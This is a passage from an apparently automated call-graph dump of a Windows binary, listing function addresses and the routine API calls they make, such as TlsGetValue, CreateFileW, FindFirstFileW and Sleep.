6628->6649 6632 80c771 6633 411190 TlsGetValue 6632->6633 6634 80c823 6632->6634 6664 4116b0 6632->6664 6667 435df0 6632->6667 6633->6632 6671 417900 6634->6671 6643 40fec0 TlsGetValue 6644 80c90f 6643->6644 6645 40fde0 TlsGetValue 6644->6645 6646 80c918 6645->6646 6692 40fe30 6646->6692 6650 4346e4 6649->6650 6651 4113d0 TlsGetValue 6650->6651 6652 4346f1 6651->6652 6653 410b90 6652->6653 6654 410bb3 6653->6654 6655 410ba6 6653->6655 6656 410bfd 6654->6656 6658 410bc1 6654->6658 6657 40fe30 TlsGetValue 6655->6657 6696 40fd10 6656->6696 6661 410bae 6657->6661 6660 409150 TlsGetValue 6658->6660 6660->6661 6661->6632 6662 410c07 6662->6661 6663 40fe30 TlsGetValue 6662->6663 6663->6661 6702 410dc0 6664->6702 6668 435e09 6667->6668 6669 435e2c 6668->6669 6713 434200 6668->6713 6669->6632 6672 40fe80 SysFreeString 6671->6672 6673 417924 6672->6673 6684 41799a 6673->6684 6833 411060 6673->6833 6674 40fe80 SysFreeString 6676 4179a4 6674->6676 6685 4112c0 6676->6685 6677 417946 6678 417984 6677->6678 6679 417974 6677->6679 6681 40fe80 SysFreeString 6678->6681 6680 411060 2 API calls 6679->6680 6682 417982 6680->6682 6681->6682 6839 4104f0 6682->6839 6684->6674 6686 4112ce 6685->6686 6687 4100a0 TlsGetValue 6686->6687 6688 4112e8 6687->6688 6689 40fe80 6688->6689 6690 40fe94 SysFreeString 6689->6690 6691 40fea8 6689->6691 6690->6691 6691->6643 6693 40fe40 6692->6693 6694 40fe69 6692->6694 6693->6694 6695 409120 TlsGetValue 6693->6695 6694->6531 6695->6694 6697 40fd20 6696->6697 6701 40fd44 6696->6701 6698 40fd2d 6697->6698 6699 40c4c0 TlsGetValue 6697->6699 6700 4090f0 TlsGetValue 6698->6700 6699->6698 6700->6701 6701->6662 6703 410e39 6702->6703 6704 410ded 6702->6704 6705 410e66 6703->6705 6706 410e3f 6703->6706 6704->6703 6709 40c4c0 TlsGetValue 6704->6709 6708 40fcb0 TlsGetValue 6705->6708 6707 4113d0 TlsGetValue 6706->6707 6711 410e56 6707->6711 6708->6711 6709->6704 6710 410ef0 6710->6632 6711->6710 6712 40fde0 TlsGetValue 6711->6712 6712->6710 6716 440c20 6713->6716 6715 43422a 6715->6669 6717 440c52 6716->6717 6726 417be0 6717->6726 6722 410430 TlsGetValue 6723 440c9c 6722->6723 6724 40fec0 TlsGetValue 6723->6724 6725 440cac 6724->6725 6725->6715 6727 417c0d 6726->6727 6734 417c47 6726->6734 6728 417c17 6727->6728 6729 417c49 6727->6729 6738 413d70 6728->6738 6731 4111e0 TlsGetValue 6729->6731 6731->6734 6732 417c22 6733 4100a0 TlsGetValue 6732->6733 6733->6734 6735 437d50 6734->6735 6793 437d80 6735->6793 6739 413d80 6738->6739 6740 413d9a 6738->6740 6739->6740 6742 413d10 6739->6742 6740->6732 6743 413d26 6742->6743 6744 413d45 6742->6744 6746 415580 GetModuleFileNameW 6743->6746 6744->6740 6747 411240 TlsGetValue 6746->6747 6748 4155d4 6747->6748 6749 4111e0 TlsGetValue 6748->6749 6750 4155e1 6749->6750 6757 415350 6750->6757 6752 4155f2 6753 40fec0 TlsGetValue 6752->6753 6754 415627 6753->6754 6755 40fde0 TlsGetValue 6754->6755 6756 415630 6755->6756 6756->6744 6758 4153b6 6757->6758 6759 40fde0 TlsGetValue 6758->6759 6760 4153cc 6759->6760 6761 41546e 6760->6761 6763 4104b0 TlsGetValue 6760->6763 6762 40fec0 TlsGetValue 6761->6762 6764 41551f 6762->6764 6768 4153ea 6763->6768 6765 40fec0 TlsGetValue 6764->6765 6767 415531 6765->6767 6766 41542c 6769 414f80 14 API calls 6766->6769 6767->6752 6768->6766 6770 4117a0 TlsGetValue 6768->6770 6771 415446 6769->6771 6770->6766 6772 415473 6771->6772 6773 41544d 6771->6773 6776 414710 14 API calls 6772->6776 6774 415110 FindFirstFileW FindClose TlsGetValue 6773->6774 6775 415461 6774->6775 6777 410430 TlsGetValue 6775->6777 6778 415483 6776->6778 6777->6761 6779 415110 FindFirstFileW FindClose TlsGetValue 6778->6779 6780 415497 6779->6780 6781 410430 TlsGetValue 6780->6781 6783 4154a4 6781->6783 6782 4154e8 6782->6761 6785 415230 FindFirstFileW FindClose GetUserDefaultUILanguage GetLocaleInfoW TlsGetValue 6782->6785 6783->6782 6784 4154b7 GetSystemDefaultUILanguage 6783->6784 6786 414710 14 API calls 6784->6786 6787 415502 6785->6787 6788 4154c7 6786->6788 6789 410430 TlsGetValue 6787->6789 6790 415110 FindFirstFileW FindClose TlsGetValue 6788->6790 6789->6761 6791 4154db 6790->6791 6792 410430 TlsGetValue 6791->6792 6792->6782 6796 437dd0 6793->6796 6797 437e15 6796->6797 6799 437e62 6797->6799 6809 437bf0 6797->6809 6800 437eee 6799->6800 6807 437e79 6799->6807 6801 4100a0 TlsGetValue 6800->6801 6803 437d6c 6801->6803 6802 437ee1 6805 4113d0 TlsGetValue 6802->6805 6803->6722 6804 40fde0 TlsGetValue 6804->6807 6805->6803 6806 4113d0 TlsGetValue 6806->6807 6807->6802 6807->6804 6807->6806 6808 437bf0 50 API calls 6807->6808 6808->6807 6812 438220 6809->6812 6813 43829d 6812->6813 6819 438294 6812->6819 6814 40fec0 TlsGetValue 6813->6814 6815 439114 6814->6815 6816 40fde0 TlsGetValue 6815->6816 6817 437c15 6816->6817 6817->6799 6818 411240 TlsGetValue 6818->6819 6819->6813 6819->6818 6820 411190 TlsGetValue 6819->6820 6821 4113b0 TlsGetValue 6819->6821 6822 4111b0 TlsGetValue 6819->6822 6823 411290 TlsGetValue 6819->6823 6824 435980 TlsGetValue 6819->6824 6825 435950 TlsGetValue 6819->6825 6826 4359e0 TlsGetValue 6819->6826 6827 4359c0 TlsGetValue 6819->6827 6828 4381c0 TlsGetValue 6819->6828 6829 437b40 50 API calls 6819->6829 6830 435dd0 18 API calls 6819->6830 6831 435db0 18 API calls 6819->6831 6832 439be0 18 API calls 6819->6832 6820->6819 6821->6819 6822->6819 6823->6819 6824->6819 6825->6819 6826->6819 6827->6819 6828->6819 6829->6819 6830->6819 6831->6819 6832->6819 6834 411072 6833->6834 6838 411079 6833->6838 6849 40fdb0 6834->6849 6853 410c80 6838->6853 6840 4104fc 6839->6840 6845 410506 6839->6845 6841 410501 6840->6841 6842 410508 6840->6842 6843 40fe80 SysFreeString 6841->6843 6844 41051b 6842->6844 6847 410522 6842->6847 6843->6845 6846 40fe80 SysFreeString 6844->6846 6845->6684 6846->6845 6847->6845 6848 40fd90 TlsGetValue 6847->6848 6848->6845 6850 40fdd4 6849->6850 6851 40fdbb 6849->6851 6850->6838 6851->6850 6857 40fd90 6851->6857 6854 410ca3 6853->6854 6855 410c9a 6853->6855 6854->6677 6856 40fe80 SysFreeString 6855->6856 6856->6854 6858 409390 TlsGetValue 6857->6858 6859 40fda3 6858->6859 6859->6850 6861 80f751 6860->6861 6862 410430 TlsGetValue 6861->6862 6863 80f77b 6862->6863 6864 410430 TlsGetValue 6863->6864 6865 80f798 6864->6865 6866 410430 TlsGetValue 6865->6866 6867 80f7b2 6866->6867 6868 410430 TlsGetValue 6867->6868 6869 80f7cf 6868->6869 6870 410430 TlsGetValue 6869->6870 6871 80f7ec 6870->6871 6911 4104b0 6871->6911 6876 4104b0 TlsGetValue 6877 80f825 6876->6877 6919 7f7550 6877->6919 6879 80f833 6923 411580 6879->6923 6884 411580 TlsGetValue 6885 80f883 6884->6885 6952 7f76b0 6885->6952 6891 80f8b5 6892 4111e0 TlsGetValue 6891->6892 6893 80f8da 6892->6893 6894 411580 TlsGetValue 6893->6894 6895 80f8fa 6894->6895 6896 4111e0 TlsGetValue 6895->6896 6897 80f90f 6896->6897 6898 80f918 Sleep 6897->6898 6899 4116b0 TlsGetValue 6898->6899 6900 80f94c 6899->6900 7005 813400 6900->7005 6905 40fec0 TlsGetValue 6906 80f9a1 6905->6906 6907 40fec0 TlsGetValue 6906->6907 6908 80f9b3 6907->6908 6909 40fec0 TlsGetValue 6908->6909 6910 80f9c5 Sleep 6909->6910 6910->6541 6912 4104c5 6911->6912 6913 40fde0 TlsGetValue 6912->6913 6914 4104e0 6913->6914 6915 437200 6914->6915 6916 43721e 6915->6916 7020 448740 6916->7020 6920 7f756a 6919->6920 7027 7fd270 6920->7027 6922 7f7596 6922->6879 6924 4115b0 6923->6924 6925 41159e 6923->6925 6927 4115b8 6924->6927 6928 4115ca 6924->6928 6926 410430 TlsGetValue 6925->6926 6931 4115ab 6926->6931 6932 410430 TlsGetValue 6927->6932 6929 4115d7 6928->6929 6930 4115e9 6928->6930 6933 4114b0 TlsGetValue 6929->6933 6934 4115f2 6930->6934 6935 41167e 6930->6935 6944 80c9f0 6931->6944 6932->6931 6933->6931 6936 411621 6934->6936 6938 40c4c0 TlsGetValue 6934->6938 6937 410430 TlsGetValue 6935->6937 6940 40fcb0 TlsGetValue 6936->6940 6939 41168b 6937->6939 6938->6936 6941 4114b0 TlsGetValue 6939->6941 6942 411628 6940->6942 6941->6931 6943 40fde0 TlsGetValue 6942->6943 6943->6931 6945 80ca1e 6944->6945 7063 511af0 6945->7063 6947 80ca60 7068 5119a0 6947->7068 6949 80cad1 6950 40fec0 TlsGetValue 6949->6950 6951 80caf7 6950->6951 6951->6884 6953 7f78b0 50 API calls 6952->6953 6955 7f76d1 6953->6955 6954 511410 57 API calls 6956 7f773c 6954->6956 6957 440a70 33 API calls 6955->6957 6959 7f76eb 6955->6959 7137 7f77a0 6956->7137 6957->6959 6959->6954 6961 7f8ba0 6962 7f8bb9 6961->6962 6963 7f8be7 6962->6963 6965 440a70 33 API calls 6962->6965 6964 7f8c27 6963->6964 7452 7f8030 6963->7452 6967 7f78b0 6964->6967 6965->6963 6968 411b70 TlsGetValue 6967->6968 6969 7f78d9 6968->6969 6970 411b70 TlsGetValue 6969->6970 6975 7f78ec 6970->6975 6971 7f7e29 6972 460d30 50 API calls 6971->6972 6973 7f7e57 6972->6973 6974 411d20 14 API calls 6973->6974 6976 7f7ec2 6974->6976 6975->6971 6977 45e650 33 API calls 6975->6977 6980 7f7c41 6975->6980 6983 412220 18 API calls 6975->6983 6987 411d20 14 API calls 6975->6987 7001 7f4930 33 API calls 6975->7001 7003 7f48d0 33 API calls 6975->7003 7004 7f4830 46 API calls 6975->7004 6978 411d20 14 API calls 6976->6978 6977->6975 6979 7f7ed5 6978->6979 6979->6891 6981 413390 18 API calls 6980->6981 6982 7f7cea 6980->6982 6981->6982 8321 7f4930 6982->8321 6983->6975 6985 7f7d40 8325 7f48d0 6985->8325 6987->6975 6988 7f7d5c 6989 7f48d0 33 API calls 6988->6989 6990 7f7d78 6989->6990 6991 7f48d0 33 API calls 6990->6991 6992 7f7d94 6991->6992 6993 7f48d0 33 API calls 6992->6993 6994 7f7db0 6993->6994 6995 7f4930 33 API calls 6994->6995 6996 7f7dca 6995->6996 6997 7f4930 33 API calls 6996->6997 6998 7f7de4 6997->6998 6999 7f48d0 33 API calls 6998->6999 7000 7f7e00 6999->7000 7000->6971 8329 7f4830 7000->8329 7001->6975 7003->6975 7004->6975 7006 813421 7005->7006 7007 4116b0 TlsGetValue 7006->7007 7008 813451 7007->7008 7009 40fde0 TlsGetValue 7008->7009 7010 81348d 7009->7010 7011 40fec0 TlsGetValue 7010->7011 7012 80f970 7011->7012 7013 813c90 7012->7013 8335 40ff70 7013->8335 7016 420e80 7017 813cbf Sleep 7016->7017 7018 40fde0 TlsGetValue 7017->7018 7019 80f986 Sleep 7018->7019 7019->6905 7023 4117a0 7020->7023 7024 4117b2 7023->7024 7025 4100a0 TlsGetValue 7024->7025 7026 4117f1 7025->7026 7026->6876 7029 7fd292 7027->7029 7033 801c50 7029->7033 7030 7fd2b6 7036 7fd350 7030->7036 7032 7fd2c5 7032->6922 7040 4d3e50 7033->7040 7035 801c6d 7035->7030 7037 7fd376 7036->7037 7038 801c50 TlsGetValue 7037->7038 7039 7fd404 7037->7039 7038->7039 7039->7032 7041 4d3ea5 7040->7041 7042 4d3e5e 7040->7042 7043 4d3ead 7041->7043 7044 4d3eb3 7041->7044 7045 4d3ea3 7042->7045 7052 4d2750 7042->7052 7046 4d3ecb 7043->7046 7047 4d3eb1 7043->7047 7055 4d2fd0 7044->7055 7045->7035 7049 4093f0 TlsGetValue 7046->7049 7059 4d3040 7047->7059 7049->7045 7053 4090f0 TlsGetValue 7052->7053 7054 4d2766 7053->7054 7054->7045 7056 4d2fdb 7055->7056 7057 4d2fee 7056->7057 7058 4d2750 TlsGetValue 7056->7058 7057->7045 7058->7057 7061 4d304b 7059->7061 7060 4d305e 7060->7045 7061->7060 7062 4d2750 TlsGetValue 7061->7062 7062->7060 7071 511410 7063->7071 7065 511b1b 7075 511aa0 7065->7075 7067 511b2d 7067->6947 7069 511410 57 API calls 7068->7069 7070 5119cc 7069->7070 7070->6949 7072 511433 7071->7072 7079 5114c0 7072->7079 7074 511462 7074->7065 7076 511ab9 7075->7076 7077 511ae5 7076->7077 7127 50f310 7076->7127 7077->7067 7080 511515 7079->7080 7081 511618 7080->7081 7082 51154a 7080->7082 7123 436300 7081->7123 7102 436380 7082->7102 7085 51162b 7087 4374d0 2 API calls 7085->7087 7101 51160b 7085->7101 7086 410430 TlsGetValue 7089 5116c5 7086->7089 7090 51165a GetLastError 7087->7090 7088 51158c 7088->7101 7106 4374d0 7088->7106 7093 40fec0 TlsGetValue 7089->7093 7094 43ea00 3 API calls 7090->7094 7097 5116d5 7093->7097 7095 511679 7094->7095 7098 440c20 50 API calls 7095->7098 7097->7074 7098->7101 7099 5115de 7100 440c20 50 API calls 7099->7100 7100->7101 7101->7086 7103 4363e6 7102->7103 7104 436399 7102->7104 7103->7088 7105 43639e CreateFileW 7104->7105 7105->7103 7107 4374e9 7106->7107 7108 437520 7107->7108 7109 43750f 7107->7109 7111 43751e GetLastError 7108->7111 7112 4113d0 TlsGetValue 7108->7112 7110 4100a0 TlsGetValue 7109->7110 7110->7111 7117 43ea00 7111->7117 7113 43752e 7112->7113 7114 437536 GetFullPathNameW 7113->7114 7115 437556 7114->7115 7115->7111 7116 4113d0 TlsGetValue 7115->7116 7116->7111 7118 43ea32 FormatMessageW 7117->7118 7119 43ea2b 7117->7119 7120 43ea68 7118->7120 7119->7118 7121 4100a0 TlsGetValue 7120->7121 7122 43eaa1 LocalFree 7121->7122 7122->7099 7124 436316 7123->7124 7125 43636e 7123->7125 7124->7125 7126 436328 CreateFileW 7124->7126 7125->7085 7126->7125 7128 50f331 7127->7128 7131 50f351 7128->7131 7133 440a70 7128->7133 7129 50f39d 7129->7077 7131->7129 7132 440a70 33 API calls 7131->7132 7132->7131 7134 440a8e 7133->7134 7135 417be0 33 API calls 7134->7135 7136 440ab2 7135->7136 7136->7131 7138 7f78b0 50 API calls 7137->7138 7139 7f77c1 7138->7139 7140 440a70 33 API calls 7139->7140 7141 7f77dc 7139->7141 7140->7141 7142 440a70 33 API calls 7141->7142 7144 7f7811 7141->7144 7142->7144 7143 7f7753 7143->6961 7144->7143 7146 7f5cf0 7144->7146 7164 411b70 7146->7164 7151 7f603c 7191 411d20 7151->7191 7156 440a70 33 API calls 7159 7f5d61 7156->7159 7157 440a70 33 API calls 7157->7159 7158 7f4790 33 API calls 7158->7159 7159->7151 7159->7157 7159->7158 7160 7f47e0 33 API calls 7159->7160 7161 413390 18 API calls 7159->7161 7162 7f4700 46 API calls 7159->7162 7186 460bc0 7159->7186 7160->7159 7161->7159 7162->7159 7165 411bd0 7164->7165 7166 411b8a 7164->7166 7168 460d30 7165->7168 7166->7165 7197 411be0 7166->7197 7207 4645a0 7168->7207 7173 7f6d70 7174 7f6d9e 7173->7174 7384 413390 7174->7384 7176 413560 14 API calls 7177 7f5d48 7176->7177 7177->7156 7177->7159 7179 7f6de6 7180 7f6f62 7179->7180 7185 7f6fda 7179->7185 7387 7f4700 7179->7387 7181 7f6ffa 7180->7181 7183 7f6f8d 7180->7183 7182 413560 14 API calls 7181->7182 7182->7185 7184 413390 18 API calls 7183->7184 7184->7185 7185->7176 7393 462860 7186->7393 7188 460be3 7397 412ac0 7188->7397 7192 411ddf 7191->7192 7193 411d42 7191->7193 7192->7143 7193->7192 7194 411e20 14 API calls 7193->7194 7196 4093f0 TlsGetValue 7193->7196 7405 417420 7193->7405 7194->7193 7196->7193 7198 411bfb 7197->7198 7204 411c4b 7197->7204 7199 411c34 7198->7199 7200 411c12 7198->7200 7201 411cbc 7198->7201 7202 4093f0 TlsGetValue 7199->7202 7199->7204 7200->7199 7200->7204 7205 411c32 7200->7205 7203 411b70 TlsGetValue 7201->7203 7201->7204 7202->7204 7203->7201 7204->7166 7204->7204 7205->7204 7206 411be0 TlsGetValue 7205->7206 7206->7205 7208 4645b0 7207->7208 7209 4645c5 7207->7209 7210 440a70 33 API calls 7208->7210 7211 4645f4 7209->7211 7212 464360 18 API calls 7209->7212 7210->7209 7213 460d42 7211->7213 7218 461740 7211->7218 7212->7211 7215 464360 7213->7215 7257 412f60 7215->7257 7219 46176e 7218->7219 7220 440a70 33 API calls 7219->7220 7221 4617b3 7219->7221 7220->7221 7222 46181f 7221->7222 7223 4090f0 TlsGetValue 7221->7223 7230 4619a3 7221->7230 7224 4619a5 7222->7224 7225 46196c 7222->7225 7223->7222 7227 412ae0 14 API calls 7224->7227 7231 412ae0 7225->7231 7227->7230 7229 409120 TlsGetValue 7229->7230 7230->7213 7234 411e20 7231->7234 7233 412ae9 7233->7229 7235 411e40 7234->7235 7241 411eb4 7234->7241 7236 411e81 7235->7236 7237 411e4d 7235->7237 7236->7241 7242 411e9b 7236->7242 7251 411f60 7236->7251 7238 411e57 7237->7238 7253 411f21 7237->7253 7239 411e60 7238->7239 7240 411eaa 7238->7240 7239->7241 7245 411e72 7239->7245 7250 411ed7 7239->7250 7244 40fef0 TlsGetValue 7240->7244 7241->7233 7243 411f7a 7242->7243 7246 411ea8 7242->7246 7248 4093f0 TlsGetValue 7243->7248 7244->7241 7245->7243 7255 411e7f 7245->7255 7252 40fec0 TlsGetValue 7246->7252 7247 413560 14 API calls 7247->7251 7248->7241 7249 411d20 14 API calls 7249->7253 7250->7241 7254 411df0 TlsGetValue 7250->7254 7251->7241 7251->7247 7252->7241 7253->7241 7253->7249 7254->7250 7255->7241 7256 411e20 14 API calls 7255->7256 7256->7255 7258 412faf 7257->7258 7263 412fd5 7257->7263 7259 412fbd 7258->7259 7260 4093f0 TlsGetValue 7258->7260 7294 413560 7259->7294 7260->7259 7262 412fd0 7262->7151 7262->7173 7264 413057 7263->7264 7266 4093f0 TlsGetValue 7263->7266 7265 41306a 7264->7265 7267 4093f0 TlsGetValue 7264->7267 7268 41307f 7265->7268 7269 4131a9 7265->7269 7266->7264 7267->7265 7270 413092 7268->7270 7271 41318f 7268->7271 7273 4090f0 TlsGetValue 7269->7273 7300 412f00 7270->7300 7272 409150 TlsGetValue 7271->7272 7278 41314a 7272->7278 7275 4131b2 7273->7275 7282 41320f 7275->7282 7321 412750 7275->7321 7277 41314c 7279 413180 7277->7279 7281 412ae0 14 API calls 7277->7281 7278->7262 7287 412f60 18 API calls 7278->7287 7283 409150 TlsGetValue 7279->7283 7280 4130a3 7284 4090f0 TlsGetValue 7280->7284 7281->7279 7286 413560 14 API calls 7282->7286 7283->7278 7288 4130c8 7284->7288 7286->7278 7287->7278 7288->7278 7310 412920 7288->7310 7290 41310d 7291 413141 7290->7291 7292 412ae0 14 API calls 7290->7292 7293 409120 TlsGetValue 7291->7293 7292->7291 7293->7278 7295 4135d2 7294->7295 7297 413574 7294->7297 7295->7262 7296 4135c6 7298 409120 TlsGetValue 7296->7298 7297->7295 7297->7296 7299 411e20 14 API calls 7297->7299 7298->7295 7299->7296 7301 419650 TlsGetValue 7300->7301 7302 412f0e 7301->7302 7303 412f17 7302->7303 7304 412f26 7302->7304 7305 419650 TlsGetValue 7303->7305 7306 419650 TlsGetValue 7304->7306 7309 412f1c 7305->7309 7307 412f36 7306->7307 7308 419650 TlsGetValue 7307->7308 7308->7309 7309->7277 7309->7280 7311 412940 7310->7311 7316 412980 7310->7316 7312 412982 7311->7312 7313 41294d 7311->7313 7314 412957 7312->7314 7315 412a2e 7312->7315 7313->7314 7320 4129f8 7313->7320 7314->7316 7319 4093f0 TlsGetValue 7314->7319 7315->7316 7347 4124e0 7315->7347 7316->7290 7317 412920 18 API calls 7317->7320 7319->7316 7320->7316 7320->7317 7322 412770 7321->7322 7331 412801 7321->7331 7323 41277d 7322->7323 7324 4127bc 7322->7324 7325 412787 7323->7325 7332 41289f 7323->7332 7327 4127d6 7324->7327 7330 4128eb 7324->7330 7324->7331 7326 412790 7325->7326 7335 4127e5 7325->7335 7328 412806 7326->7328 7329 41279d 7326->7329 7333 4127e3 7327->7333 7334 41290c 7327->7334 7328->7331 7342 4104f0 2 API calls 7328->7342 7337 4127aa 7329->7337 7338 412848 7329->7338 7330->7331 7377 4135e0 7330->7377 7331->7282 7332->7331 7365 412220 7332->7365 7333->7331 7343 410430 TlsGetValue 7333->7343 7339 4093f0 TlsGetValue 7334->7339 7335->7331 7355 410540 7335->7355 7337->7334 7345 4127b7 7337->7345 7338->7331 7361 4121f0 7338->7361 7339->7331 7342->7328 7343->7333 7345->7331 7346 412750 18 API calls 7345->7346 7346->7345 7348 412715 7347->7348 7349 412516 7347->7349 7348->7315 7349->7348 7350 412920 18 API calls 7349->7350 7351 4124e0 18 API calls 7349->7351 7352 4093f0 TlsGetValue 7349->7352 7353 417460 18 API calls 7349->7353 7354 417420 14 API calls 7349->7354 7350->7349 7351->7349 7352->7349 7353->7349 7354->7349 7356 41055b 7355->7356 7360 410575 7355->7360 7358 40fd10 TlsGetValue 7356->7358 7356->7360 7357 40fe30 TlsGetValue 7359 4105b2 7357->7359 7358->7360 7359->7335 7360->7357 7362 412206 7361->7362 7363 4121fe 7361->7363 7364 4093f0 TlsGetValue 7362->7364 7363->7338 7364->7363 7366 41249d 7365->7366 7372 412256 7365->7372 7366->7332 7367 412220 18 API calls 7367->7372 7368 4135e0 18 API calls 7368->7372 7369 410540 TlsGetValue 7369->7372 7370 417460 18 API calls 7370->7372 7371 4093f0 TlsGetValue 7371->7372 7372->7366 7372->7367 7372->7368 7372->7369 7372->7370 7372->7371 7373 4104f0 SysFreeString TlsGetValue 7372->7373 7374 410430 TlsGetValue 7372->7374 7375 4121f0 TlsGetValue 7372->7375 7376 412750 18 API calls 7372->7376 7373->7372 7374->7372 7375->7372 7376->7372 7378 4135f5 7377->7378 7379 41360b 7377->7379 7378->7379 7380 4135fb 7378->7380 7383 413560 14 API calls 7379->7383 7381 4133d0 18 API calls 7380->7381 7382 413609 7381->7382 7382->7330 7383->7382 7385 412f60 18 API calls 7384->7385 7386 4133c1 7385->7386 7386->7179 7388 7f471d 7387->7388 7389 7f474b 7388->7389 7390 440a70 33 API calls 7388->7390 7391 413560 14 API calls 7389->7391 7390->7389 7392 7f4768 7391->7392 7392->7179 7394 462877 7393->7394 7395 46288d 7394->7395 7401 462810 7394->7401 7395->7188 7398 412ac9 7397->7398 7399 412ace 7397->7399 7400 412750 18 API calls 7398->7400 7399->7159 7400->7399 7403 46282e 7401->7403 7402 464360 18 API calls 7404 462856 7402->7404 7403->7402 7404->7395 7406 417453 7405->7406 7407 417432 7405->7407 7406->7193 7411 40cf00 7407->7411 7420 4159e0 7411->7420 7413 40cf2a 7424 40ced0 7413->7424 7416 4173c0 7417 4173e4 7416->7417 7418 4173c9 7416->7418 7417->7406 7428 416ef0 7418->7428 7421 415a03 7420->7421 7422 4159f9 7420->7422 7421->7422 7423 409390 TlsGetValue 7421->7423 7422->7413 7423->7422 7425 40cef5 7424->7425 7426 40cee1 7424->7426 7425->7416 7426->7425 7427 409390 TlsGetValue 7426->7427 7427->7425 7429 416fb3 7428->7429 7430 416f19 7428->7430 7429->7417 7436 4169e0 7430->7436 7432 416f57 7440 416a90 7432->7440 7437 4169f9 7436->7437 7438 4169ee 7436->7438 7437->7432 7439 40d960 12 API calls 7438->7439 7439->7437 7441 416aa6 7440->7441 7442 416a9e 7440->7442 7441->7429 7444 416600 7441->7444 7443 40db30 GetCurrentThreadId Sleep TlsGetValue 7442->7443 7443->7441 7445 416390 12 API calls 7444->7445 7447 416642 7445->7447 7446 4166c0 7448 4163b0 GetCurrentThreadId Sleep TlsGetValue 7446->7448 7447->7446 7449 41669f 7447->7449 7450 4166cb 7448->7450 7451 4166e0 GetCurrentThreadId Sleep TlsGetValue 7449->7451 7450->7429 7451->7450 7453 411b70 TlsGetValue 7452->7453 7454 7f80b3 7453->7454 7455 411b70 TlsGetValue 7454->7455 7456 7f80c6 7455->7456 7457 411b70 TlsGetValue 7456->7457 7458 7f80d9 7457->7458 7459 411b70 TlsGetValue 7458->7459 7460 7f80ec 7459->7460 7461 411b70 TlsGetValue 7460->7461 7462 7f80ff 7461->7462 7463 411b70 TlsGetValue 7462->7463 7464 7f8112 7463->7464 7465 411b70 TlsGetValue 7464->7465 7466 7f8125 7465->7466 7467 411d20 14 API calls 7466->7467 7468 7f8139 7467->7468 7598 7f9110 7468->7598 7471 412220 18 API calls 7472 7f8173 7471->7472 7473 40fde0 TlsGetValue 7472->7473 7474 7f8180 7473->7474 7641 7f7400 7474->7641 7477 7f823e 7672 442eb0 7477->7672 7479 411d20 14 API calls 7481 7f81c7 7479->7481 7651 45e650 7481->7651 7483 4104b0 TlsGetValue 7485 7f8278 7483->7485 7484 7f81dd 7486 412220 18 API calls 7484->7486 7487 7f82c1 7485->7487 7488 7f8281 7485->7488 7489 7f8210 7486->7489 7742 437410 7487->7742 7717 57a950 7488->7717 7655 7f5410 7489->7655 7496 57a950 33 API calls 7500 7f82fa 7496->7500 7497 4104b0 TlsGetValue 7498 7f82b2 7497->7498 7501 40fde0 TlsGetValue 7498->7501 7499 411d20 14 API calls 7499->7477 7502 4104b0 TlsGetValue 7500->7502 7503 7f82bf 7501->7503 7504 7f830d 7502->7504 7746 437260 7503->7746 7505 40fde0 TlsGetValue 7504->7505 7505->7503 7508 7f8359 7510 7f883d 7508->7510 7511 7f8396 7508->7511 7509 437260 TlsGetValue 7512 7f8350 7509->7512 7816 7f8a80 7510->7816 7513 511410 57 API calls 7511->7513 7750 579290 7512->7750 7516 7f83b0 7513->7516 7517 410430 TlsGetValue 7516->7517 7519 7f83cf 7517->7519 7518 40fec0 TlsGetValue 7520 7f885a 7518->7520 7521 7f8524 7519->7521 7522 7f83e2 7519->7522 7524 40fec0 TlsGetValue 7520->7524 7523 411d20 14 API calls 7521->7523 7525 411d20 14 API calls 7522->7525 7526 7f854a 7523->7526 7527 7f886c 7524->7527 7528 7f8408 7525->7528 7529 45e650 33 API calls 7526->7529 7530 411d20 14 API calls 7527->7530 7531 45e650 33 API calls 7528->7531 7532 7f8560 7529->7532 7533 7f887f 7530->7533 7534 7f841e 7531->7534 7536 412220 18 API calls 7532->7536 7537 411e20 14 API calls 7533->7537 7535 412220 18 API calls 7534->7535 7538 7f8451 7535->7538 7539 7f8593 7536->7539 7540 7f8899 7537->7540 7541 411d20 14 API calls 7538->7541 7542 510740 50 API calls 7539->7542 7543 411e20 14 API calls 7540->7543 7544 7f8475 7541->7544 7545 7f85ad 7542->7545 7546 7f88b3 7543->7546 7549 411d20 14 API calls 7544->7549 7553 7f851f 7544->7553 7547 411d20 14 API calls 7545->7547 7548 40fec0 TlsGetValue 7546->7548 7547->7553 7550 7f88c5 7548->7550 7551 7f84a8 7549->7551 7552 411d20 14 API calls 7550->7552 7554 45e650 33 API calls 7551->7554 7555 7f88d8 7552->7555 7556 40fde0 TlsGetValue 7553->7556 7557 7f84be 7554->7557 7555->6963 7558 7f862b 7556->7558 7559 412220 18 API calls 7557->7559 7770 436880 7558->7770 7561 7f84f1 7559->7561 7759 510740 7561->7759 7562 7f8639 7564 7f87ff 7562->7564 7779 7f4670 7562->7779 7567 411d20 14 API calls 7564->7567 7575 7f8817 7567->7575 7568 411d20 14 API calls 7568->7553 7570 7f86ba 7571 411d20 14 API calls 7570->7571 7573 7f86dd 7571->7573 7576 45e650 33 API calls 7573->7576 7575->7518 7578 7f86f0 7576->7578 7580 412220 18 API calls 7578->7580 7582 7f8720 7580->7582 7584 411d20 14 API calls 7582->7584 7586 7f8749 7584->7586 7585 579ce0 80 API calls 7585->7570 7586->7564 7587 411d20 14 API calls 7586->7587 7588 7f8776 7587->7588 7589 45e650 33 API calls 7588->7589 7590 7f8789 7589->7590 7591 412220 18 API calls 7590->7591 7592 7f87b9 7591->7592 7809 579f50 7592->7809 7597 411d20 14 API calls 7597->7564 7599 411b70 TlsGetValue 7598->7599 7600 7f9158 7599->7600 7601 411b70 TlsGetValue 7600->7601 7602 7f916b 7601->7602 7603 411b70 TlsGetValue 7602->7603 7604 7f917b 7603->7604 7605 7f91bb 7604->7605 7606 440a70 33 API calls 7604->7606 7607 7f91f7 7605->7607 7608 440a70 33 API calls 7605->7608 7606->7605 7609 413560 14 API calls 7607->7609 7608->7607 7610 7f9222 7609->7610 7611 411d20 14 API calls 7610->7611 7612 7f9288 7611->7612 7613 45e650 33 API calls 7612->7613 7614 7f929b 7613->7614 7615 412220 18 API calls 7614->7615 7616 7f92cb 7615->7616 7617 411d20 14 API calls 7616->7617 7618 7f9304 7617->7618 7619 440a70 33 API calls 7618->7619 7620 7f9343 7618->7620 7619->7620 7621 413390 18 API calls 7620->7621 7623 7f94cb 7621->7623 7622 7f9525 7625 411d20 14 API calls 7622->7625 7623->7622 7624 413390 18 API calls 7623->7624 7624->7622 7626 7f956c 7625->7626 7627 45e650 33 API calls 7626->7627 7628 7f957f 7627->7628 7629 412220 18 API calls 7628->7629 7630 